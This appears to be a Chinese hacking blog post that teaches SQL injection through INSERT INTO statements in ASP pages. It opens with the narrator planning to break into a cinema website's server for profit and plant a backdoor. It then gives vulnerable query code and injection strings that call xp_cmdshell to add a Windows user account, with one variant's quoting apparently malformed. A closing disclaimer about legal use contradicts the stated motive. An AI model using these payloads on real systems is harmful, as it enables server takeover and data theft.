巧用数据库insert Into进行入侵注入

在酷吧闲逛之际，偶然坐在收银台旁与收银小姐姐闲聊几句。不经意间，我发现"电影影线"的海报上写着关于站点卡的秘密优惠：只要卡的密码最后一位是6或7，就能获得一张价值5元的易卡。

我的脑海中瞬间闪过一个念头，如果整个网站的数据都在我手中，那么我是否可以通过这些卡片赚取一笔不小的财富呢？紧接着，我脑海中浮现出一个更大胆的想法：何不尝试进入他们的服务器，顺便留下后门呢？在这个过程中，一个新的思考点逐渐成形——利用insert Into进行注入。

关于SQL注入，大多数人可能只熟悉在select语句中的注入方式。我们是否可以利用insert Into Table的语句来实现注入攻击呢？想象一下，在存在漏洞的网站上填写QQ、Email或地址时执行任意命令的场景。这一想法令我颇为兴奋。

曾经与"乱刀"简单讨论过这个问题，但一直未曾付诸实践。刚刚，我发现这确实是一个可行的方案。让我给你举个例子吧。

假设有一个页面xiaomo.asp，其中有一句代码：Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (‘1’,’1’,’1’,’1’,’"&Request("u")&"’)"。我们可以通过Request("U")未过滤的变量执行任意系统命令。这意味着我们可以直接提交如下链接： master..xp_cmdshell "net user xiaomo aa /add"-- 来添加一个系统用户。这是因为我们构造的代码在提交后变成了：Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (‘1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"-- ，从而“正确”地执行了命令。

如果页面中的漏洞代码是另一种形式：Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (‘"&Request("u")&"’,’1’,’1’,’1’,’1’)" ，我们同样有办法应对。只需稍作变通，提交如下链接： master..xp_cmdshell "net user xiaomo aa /add"-" 即可实现我们的目的。这种方法的关键在于理解并适应对方语句的结构。但需要注意的是，这种方法需要了解对方的具体代码结构，主要用于检测并修复特定程序的漏洞。但切记，这必须建立在合法和道德的基础上，任何非法行为都是不被允许的。